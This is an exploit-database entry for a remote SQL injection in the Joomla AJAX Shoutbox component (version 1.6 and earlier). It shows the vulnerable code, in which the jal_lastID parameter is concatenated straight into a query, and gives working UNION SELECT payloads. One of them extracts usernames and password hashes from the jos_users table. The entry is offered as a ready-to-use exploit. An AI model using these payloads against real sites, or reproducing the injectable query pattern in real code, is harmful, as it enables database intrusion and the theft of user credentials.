id: 22032
date: 03/17/2014
title: Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability
author: Pen Ten
cves: 

[+] Details:
[-] include "helper.php";
[-] parameter: jal_lastID
[-] Code: 
113 $jal_lastID = JRequest::getVar( 'jal_lastID',       0        );
114
115 $query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';
 
[-] Exploit: 
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -
 
Example:
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -

#  0day.today [2023-03-24]  #